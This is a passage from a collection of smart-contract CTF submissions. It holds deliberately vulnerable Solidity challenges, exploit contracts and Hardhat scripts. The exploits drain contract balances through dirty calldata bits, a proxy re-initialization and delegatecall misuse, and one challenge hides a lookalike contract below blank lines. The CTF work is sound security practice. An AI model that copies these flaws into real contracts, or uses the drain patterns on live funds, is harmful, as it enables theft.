contract Exploit { 4 | 5 | address pixelPavelContract; 6 | 7 | constructor(address _pixelPavelContract) { 8 | pixelPavelContract = _pixelPavelContract; 9 | } 10 | 11 | function finalize() external { 12 | /* We need to pass in 42 as a parameter to get past the first 'require'. 13 | However, we also need to pass in a value of 298 to pass the second check. 14 | 15 | So how do we do that? Dirty higher order bits. 16 | 17 | The parameter is a uint8 but every function parameter is always 32 bytes. 18 | So we exploit this by sneaking in some other values in the bytes that will be 19 | ignored by the function parameter. 20 | 21 | So what we need to do is pass in the value 298, which is represented in hex as `12a`, 22 | which will cleanly map to a hex uint8 value of '2a', which allows us to pass 23 | the first require. 24 | 25 | To pass the second require, we simply just need to make sure the bytes comparison 26 | matches, which it will do if we pass in the value 298. 27 | 28 | Note, this only works in pre Solidity 0.8. Since then the runtime will revert 29 | in the event of dirty higher order bits. 30 | 31 | */ 32 | bytes memory data = abi.encodeWithSignature("crackCode(uint8)", 298); 33 | (bool success, bytes memory returnData) = pixelPavelContract.call(data); 34 | require(success, "Finalize failed"); 35 | } 36 | } -------------------------------------------------------------------------------- /ebaizel/contracts/PixelPavel.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.6; 2 | 3 | /* 4 | The nefarious Pixel Pavel has struck again! This time exploiting a DeFi 5 | protocol and draining 298 Wei. Interpol does not know his whereabouts but 6 | they have identified this contract as where he is keeping his funds. 7 | 8 | After scouring StackOverflow and many Discord channels, they were still 9 | unable to crack the code and retrieve the funds. So, now they have 10 | reached out to you, Esther Von Munchen, as their last hope to retrieve 11 | the funds. 12 | 13 | Be sharp, be patient, and those 298 Wei will return to their rightful owner. 14 | 15 | Good luck! 16 | */ 17 | 18 | contract PixelPavel { 19 | uint8 constant public smallPrizeAnswer = 42; 20 | uint256 constant public bigPrizeWinningAnswer = 298; 21 | 22 | constructor() payable { 23 | require(msg.value == bigPrizeWinningAnswer, "Gotta pay to play, 298 Wei."); 24 | } 25 | 26 | function crackCode(uint8 _smallAnswer) external { 27 | require(_smallAnswer == smallPrizeAnswer, "Answer must equal 42."); 28 | 29 | // Well done! You won the small prize. Now let's try for the big kahuna. 30 | (bytes32 sig, bytes32 data) = abi.decode( 31 | abi.encodePacked(bytes28(0), msg.data), 32 | (bytes32,bytes32) 33 | ); 34 | 35 | if (keccak256(abi.encode(bigPrizeWinningAnswer)) == keccak256(abi.encode(data))) { 36 | uint amount = address(this).balance; 37 | (bool success, ) = payable(tx.origin).call{value: amount}(""); 38 | require(success, "Failed to send Ether"); 39 | } 40 | } 41 | } -------------------------------------------------------------------------------- /ebaizel/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.6; 2 | 3 | import './PixelPavel.sol'; 4 | 5 | interface ISetup { 6 | event Deployed(address instance); 7 | function isSolved() external view returns (bool); 8 | } 9 | 10 | contract Setup is ISetup { 11 | PixelPavel public instance; 12 | 13 | constructor() payable { 14 | require(msg.value == 298, "Gotta pay to play, 298 Wei."); 15 | instance = new PixelPavel{value: 298 wei}(); 16 | emit Deployed(address(instance)); 17 | } 18 | 19 | function isSolved() override external view returns (bool) { 20 | return (address(instance).balance == 0); 21 | } 22 | } -------------------------------------------------------------------------------- /hack3r-0m/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /hack3r-0m/README.md: -------------------------------------------------------------------------------- 1 | # Example CTF submission 2 | 3 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | BitMania.sol | [0x16051547CbaD42bBec882A7E9e6091796d0D1f50](https://goerli.etherscan.io/address/0x16051547CbaD42bBec882A7E9e6091796d0D1f50) | 8 | | Setup.sol | [0xA083913ed673b23dC5FB921b3909021CacFD794C](https://goerli.etherscan.io/address/0xA083913ed673b23dC5FB921b3909021CacFD794C) | 9 | 10 | `.env` file 11 | 12 | ``` 13 | ETHERSCAN_API= 14 | ALCHEMY_API_KEY_GOERLI= 15 | PRIVATE_KEY= 16 | ``` 17 | -------------------------------------------------------------------------------- /hack3r-0m/contracts/BitMania.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | contract BitMania { 5 | bool public isSolved; 6 | bytes public constant encFlag = 7 | bytes(hex"6e3c5b0f722c430e6d324c0d6f67173d4b1565345915753504211f"); 8 | 9 | // following function was used to encrypt the given string 10 | // when a particular string is passed, encrypted output is `encFlag` 11 | // reverse `encFlag` to input stirng to solve CTF 12 | function encryptFlag(string memory stringFlag) 13 | public 14 | pure 15 | returns (bytes memory) 16 | { 17 | bytes memory flag = bytes(stringFlag); 18 | for (uint256 i; i < flag.length; i++) { 19 | if (i > 0) flag[i] ^= flag[i - 1]; 20 | flag[i] ^= flag[i] >> 4; 21 | flag[i] ^= flag[i] >> 3; 22 | flag[i] ^= flag[i] >> 2; 23 | flag[i] ^= flag[i] >> 1; 24 | } 25 | 26 | return flag; 27 | } 28 | 29 | // solve the ctf by calling this function 30 | function solveIt(string memory flag) external { 31 | bytes memory output = encryptFlag(flag); 32 | if (keccak256(output) == keccak256(encFlag)) isSolved = true; 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /hack3r-0m/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "./BitMania.sol"; 5 | 6 | contract Exploit { 7 | 8 | /** 9 | - gray code is used to encrypt string in BitMania.sol 10 | - reverse XOR operations to find real string 11 | - Refer solution.py for complete solution 12 | */ 13 | constructor(BitMania instance) { 14 | instance.solveIt("SHERLOCK_CTF_0x0_WINNER_333"); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /hack3r-0m/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /hack3r-0m/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import './ISetup.sol'; 5 | import './BitMania.sol'; 6 | 7 | contract Setup is ISetup { 8 | BitMania public instance; 9 | 10 | constructor() { 11 | 12 | instance = new BitMania(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return instance.isSolved(); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /hack3r-0m/contracts/solution.py: -------------------------------------------------------------------------------- 1 | tr = "6e3c5b0f722c430e6d324c0d6f67173d4b1565345915753504211f" 2 | b = 0 3 | decoded = "" 4 | 5 | def gray2binary(x, s): 6 | shiftamount = s; 7 | while x >> shiftamount: 8 | x ^= x >> shiftamount 9 | shiftamount <<= 1 10 | return x 11 | 12 | for i in range(0, len(tr) - 1, 2): 13 | #Converting string to int 14 | a = int(tr[i:i+2],16) 15 | #Reading previous hex string in case of i > 0 16 | if i > 0: 17 | b = int(tr[i-2:i],16) 18 | 19 | l=a 20 | #Reversing right shift and XOR of 1,2,3,4 21 | for s in range(1,5): 22 | l = gray2binary(l,s) 23 | 24 | #XORing the last 25 | l = l ^ b 26 | 27 | #Storing the string 28 | decoded += chr(l) 29 | 30 | print(decoded) 31 | -------------------------------------------------------------------------------- /hack3r-0m/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /hack3r-0m/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /hack3r-0m/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const hre = require("hardhat"); 2 | 3 | function sleep(seconds) { 4 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 5 | } 6 | 7 | async function main() { 8 | const SETUP = await ethers.getContractFactory("Setup"); 9 | 10 | const setup = await SETUP.deploy(); 11 | await setup.deployed(); 12 | 13 | const ctf = await ethers.getContractAt( 14 | "BitMania", 15 | await setup.instance() 16 | ); 17 | 18 | console.log("Deployed setup to", setup.address); 19 | console.log("Deployed ctf to", ctf.address); 20 | 21 | // wait for etherscan to index 22 | await sleep(300); 23 | 24 | // verify 25 | await hre.run("verify:verify", { 26 | address: setup.address, 27 | }); 28 | await hre.run("verify:verify", { 29 | address: ctf.address, 30 | }); 31 | } 32 | 33 | main() 34 | .then(() => process.exit(0)) 35 | .catch((error) => { 36 | console.error(error); 37 | process.exit(1); 38 | }); 39 | -------------------------------------------------------------------------------- /iflp/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /iflp/README.md: -------------------------------------------------------------------------------- 1 | # Example CTF submission 2 | 3 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | ExampleQuizExploit.sol | [0x070Cd04E0Ab2bF1E10411f7aB1b0972164F72879](https://goerli.etherscan.io/address/0x070Cd04E0Ab2bF1E10411f7aB1b0972164F72879) | 8 | | Setup.sol | [0x38B500E61267Ee672c823bE3a8fA559236Bd1FD3](https://goerli.etherscan.io/address/0x38B500E61267Ee672c823bE3a8fA559236Bd1FD3) | 9 | | Lollercoaster.sol | [0x25Be61724B64117DC9aC9DDd2A06B7DEc052D5cb](https://goerli.etherscan.io/address/0x25Be61724B64117DC9aC9DDd2A06B7DEc052D5cb) | 10 | 11 | `.env` file 12 | 13 | ``` 14 | ETHERSCAN_API= 15 | ALCHEMY_API_KEY_GOERLI= 16 | PRIVATE_KEY= 17 | ``` 18 | -------------------------------------------------------------------------------- /iflp/contracts/ExampleQuizExploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.0; 2 | import "hardhat/console.sol"; 3 | 4 | contract Lollercoaster { 5 | function randInt(uint256 n) external view returns (uint256) { 6 | return (uint160(address(this)) + block.number / 100) % n; 7 | } 8 | } 9 | 10 | contract ExampleQuizExploit { 11 | Lollercoaster private rng; 12 | bool private initialized = false; 13 | 14 | constructor() payable {} 15 | 16 | function initialize(address lollercoaster) external { 17 | require(initialized == false, "Already initialized"); 18 | rng = Lollercoaster(lollercoaster); 19 | console.log("ADDR", address(rng)); 20 | initialized = true; 21 | console.log("asdadasd", rng.randInt(1000000)); 22 | } 23 | 24 | function guess(uint256 n) external payable { 25 | require(msg.value == 1 ether); 26 | 27 | if (n == rng.randInt(1000000)) { 28 | // Send all ether to user 29 | (bool success, ) = msg.sender.call{value: address(this).balance}( 30 | "" 31 | ); 32 | require(success, "send fail"); 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /iflp/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.0; 2 | 3 | import "./ExampleQuizExploit.sol"; 4 | 5 | contract Exploit { 6 | constructor(ExampleQuizExploit instance) payable { 7 | require(msg.value == 1 ether); 8 | 9 | // Pretty self-explanatory :) 10 | instance.guess{value: 1 ether}(1011337101); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /iflp/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.0; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /iflp/contracts/Lollercoaster.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.0; 2 | 3 | contract LolIercoaster { 4 | function randInt(uint256 n) external view returns (uint256) { 5 | return (uint160(address(this)) + block.number / 100) % n; 6 | } 7 | } 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | contract Lollercoaster { 58 | uint256 public var620495566; 59 | 60 | constructor() { 61 | var620495566 = 1011337101; 62 | } 63 | 64 | function randInt(uint32 n) external view returns (uint256) { 65 | return var620495566 % n; 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /iflp/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.0; 2 | 3 | import "./ISetup.sol"; 4 | import "./ExampleQuizExploit.sol"; 5 | 6 | contract Setup is ISetup { 7 | ExampleQuizExploit public instance; 8 | Lollercoaster public rng; 9 | bool private isInitialized = false; 10 | 11 | constructor() payable { 12 | require(msg.value == 1 ether); 13 | instance = new ExampleQuizExploit{value: 1 ether}(); 14 | emit Deployed(address(instance)); 15 | } 16 | 17 | function isSolved() external view override returns (bool) { 18 | return address(instance).balance == 0; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /iflp/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require('@nomiclabs/hardhat-waffle'); 2 | require('@nomiclabs/hardhat-etherscan'); 3 | require('dotenv').config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ''; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ''; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ''; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task('accounts', 'Prints the list of accounts', async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: '0.7.0', 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ''), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /iflp/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sherlock-ctf-0x0-iflp", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /iflp/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require('ethers/lib/utils'); 2 | const hre = require('hardhat'); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const LOLLERCOASTER = await ethers.getContractFactory( 10 | 'contracts/Lollercoaster.sol:Lollercoaster' 11 | ); 12 | const lollercoaster = await LOLLERCOASTER.deploy(); 13 | console.log('Deployed lollercoaster to', lollercoaster.address); 14 | 15 | const SETUP = await ethers.getContractFactory('Setup'); 16 | const setup = await SETUP.deploy({ value: parseEther('1') }); 17 | await setup.deployed(); 18 | const ctf = await ethers.getContractAt('ExampleQuizExploit', await setup.instance()); 19 | await ctf.initialize(lollercoaster.address); 20 | 21 | console.log('Deployed setup to', setup.address); 22 | console.log('Deployed ctf to', ctf.address); 23 | 24 | // wait for etherscan to index 25 | await sleep(300); 26 | 27 | // verify 28 | await hre.run('verify:verify', { 29 | address: lollercoaster.address, 30 | }); 31 | await hre.run('verify:verify', { 32 | address: setup.address, 33 | }); 34 | await hre.run('verify:verify', { 35 | address: ctf.address, 36 | }); 37 | } 38 | 39 | main() 40 | .then(() => process.exit(0)) 41 | .catch((error) => { 42 | console.error(error); 43 | process.exit(1); 44 | }); 45 | -------------------------------------------------------------------------------- /iflp/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require('ethers/lib/utils'); 2 | 3 | async function main() { 4 | const LOLLERCOASTER = await ethers.getContractFactory( 5 | 'contracts/Lollercoaster.sol:Lollercoaster' 6 | ); 7 | const lollercoaster = await LOLLERCOASTER.deploy(); 8 | console.log('Deployed lollercoaster to', lollercoaster.address); 9 | const SETUP = await ethers.getContractFactory('Setup'); 10 | const EXPLOIT = await ethers.getContractFactory('Exploit'); 11 | 12 | const setup = await SETUP.deploy({ value: parseEther('1') }); 13 | await setup.deployed(); 14 | const ctf = await ethers.getContractAt('ExampleQuizExploit', await setup.instance()); 15 | await ctf.initialize(lollercoaster.address); 16 | console.log('solved:', await setup.isSolved()); 17 | 18 | await EXPLOIT.deploy(ctf.address, { value: parseEther('1') }); 19 | 20 | console.log('solved:', await setup.isSolved()); 21 | } 22 | 23 | main() 24 | .then(() => process.exit(0)) 25 | .catch((error) => { 26 | console.error(error); 27 | process.exit(1); 28 | }); 29 | -------------------------------------------------------------------------------- /johngish/README.md: -------------------------------------------------------------------------------- 1 | 2 | Setup : https://goerli.etherscan.io/address/0x427255b0e21a7f0d809c7ce854569a10df44378d#code 3 | 4 | Challenge: https://goerli.etherscan.io/address/0x2dec5971b627485a50af67a921c6adb6cc3ffce4 5 | -------------------------------------------------------------------------------- /johngish/contracts/Challenge.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | contract Challenge { 4 | // Private number, will not be public at all ;) 5 | uint8 private constant answer = 42; 6 | 7 | constructor() payable {} 8 | 9 | function guess(uint8 n) external payable { 10 | require(msg.value == 100 wei); 11 | 12 | if (n == answer) { 13 | (bool success, ) = msg.sender.delegatecall(''); 14 | require(success, 'send fail'); 15 | } 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /johngish/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './Challenge.sol'; 4 | 5 | contract Exploit { 6 | Challenge public instance; 7 | 8 | constructor(Challenge a) payable { 9 | require(msg.value == 100 wei); 10 | instance = a; 11 | } 12 | 13 | function finalize() external { 14 | // can be used to finalize the exploit patten 15 | instance.guess{value: 100 wei}(42); 16 | } 17 | 18 | fallback() external payable { 19 | payable(0).transfer(address(this).balance); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /johngish/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /johngish/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './Challenge.sol'; 5 | 6 | contract Setup is ISetup { 7 | Challenge public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 100 wei); 11 | 12 | instance = new Challenge{value: 100 wei}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return address(instance).balance == 0; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /kankan-0/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-kankan-0 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | Dead.sol | [0x7e18A61fd65F5E5Cf693257235a0A1F360aBE7d8](https://goerli.etherscan.io/address/0x7e18A61fd65F5E5Cf693257235a0A1F360aBE7d8) | 6 | | Setup.sol | [0x9e6C0511d07695420A0B57003d6e8c133Cd0185d](https://goerli.etherscan.io/address/0x9e6C0511d07695420A0B57003d6e8c133Cd0185d) | 7 | -------------------------------------------------------------------------------- /kankan-0/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.4; 2 | 3 | import './Dead.sol'; 4 | 5 | contract Exploit { 6 | Dead instance; 7 | constructor(address _instance) payable { 8 | require(msg.value == 10 ether); 9 | instance = Dead(_instance); 10 | } 11 | 12 | function finalize () external { 13 | // can be used to finalize the exploit patten 14 | uint256 amount = 0.01 ether; 15 | instance.register{value:amount}(); 16 | instance.canKill(); 17 | uint8 i = 6; 18 | while (i-- != 0) { 19 | instance.becomeKiller{value:9*amount}(); 20 | } 21 | bool killed = instance.killed(); 22 | instance.kill(); 23 | } 24 | } -------------------------------------------------------------------------------- /kankan-0/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /kankan-0/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.4; 2 | 3 | import './ISetup.sol'; 4 | import './Dead.sol'; 5 | 6 | contract Setup is ISetup { 7 | Dead public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 0.1 ether); 11 | 12 | instance = new Dead{value: 0.1 ether}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return instance.killed(); 18 | } 19 | } -------------------------------------------------------------------------------- /kankan-0/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("0.1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "ExampleQuizExploit", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /kuldeep23907/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | artifacts 4 | cache 5 | -------------------------------------------------------------------------------- /kuldeep23907/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-kuldeep23907 2 | CTF of kuldeep23907 3 | 4 | # CTF submission 5 | 6 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 7 | 8 | | Contract | Goerli | 9 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 10 | | Challenge.sol | [0x7DC33b58B3258a745C0ADbfC46d8A4B543254f24](https://goerli.etherscan.io/address/0x7DC33b58B3258a745C0ADbfC46d8A4B543254f24) | 11 | | Setup.sol | [0x0ABBC49482097b530516d385B4dD183b59073f1C](https://goerli.etherscan.io/address/0x0ABBC49482097b530516d385B4dD183b59073f1C) | 12 | 13 | -------------------------------------------------------------------------------- /kuldeep23907/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "./Challenge.sol"; 5 | 6 | contract Exploit { 7 | Challenge instance; 8 | 9 | constructor(Challenge _instance) { 10 | instance = _instance; 11 | 12 | Slogan2 s2 = new Slogan2(); 13 | 14 | SloganProxy sp = SloganProxy(payable(instance.sloganContract())); 15 | 16 | // make slogan2 contract as new implementation of SloganProxy 17 | instance.callSloganContract( 18 | abi.encodeWithSelector(sp.initialize.selector, address(s2), "") 19 | ); 20 | 21 | // call the getAllEther to withdraw all ETH from Challenge.sol 22 | instance.callSloganContract( 23 | abi.encodeWithSelector(s2.getAllEther.selector) 24 | ); 25 | } 26 | } 27 | 28 | contract Slogan2 { 29 | function getAllEther() public { 30 | (bool success, ) = (msg.sender).call{value: address(this).balance}(""); 31 | require(success, "failed"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /kuldeep23907/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /kuldeep23907/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "./ISetup.sol"; 5 | import "./Challenge.sol"; 6 | 7 | contract Setup is ISetup { 8 | Challenge public instance; 9 | 10 | constructor() payable { 11 | require(msg.value == 1 ether); 12 | Slogan slogan = new Slogan(); 13 | SloganProxy sloganProxy = new SloganProxy(); 14 | sloganProxy.initialize(address(slogan), ""); 15 | instance = new Challenge{value: 1 ether}(address(sloganProxy)); 16 | emit Deployed(address(instance)); 17 | } 18 | 19 | function isSolved() external view override returns (bool) { 20 | return address(instance).balance == 0; 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /kuldeep23907/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | hardhat: {}, 34 | goerli: { 35 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 36 | gasPrice: 900000000000, 37 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 38 | }, 39 | }, 40 | }; 41 | -------------------------------------------------------------------------------- /kuldeep23907/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sherlock-ctf-0x0-kuldeep23907", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "repository": { 10 | "type": "git", 11 | "url": "git+https://github.com/sherlock-protocol/sherlock-ctf-0x0-kuldeep23907.git" 12 | }, 13 | "author": "", 14 | "license": "ISC", 15 | "bugs": { 16 | "url": "https://github.com/sherlock-protocol/sherlock-ctf-0x0-kuldeep23907/issues" 17 | }, 18 | "homepage": "https://github.com/sherlock-protocol/sherlock-ctf-0x0-kuldeep23907#readme", 19 | "devDependencies": { 20 | "@nomiclabs/hardhat-ethers": "^2.0.4", 21 | "@nomiclabs/hardhat-waffle": "^2.0.2", 22 | "chai": "^4.3.6", 23 | "ethereum-waffle": "^3.4.0", 24 | "ethers": "^5.5.3", 25 | 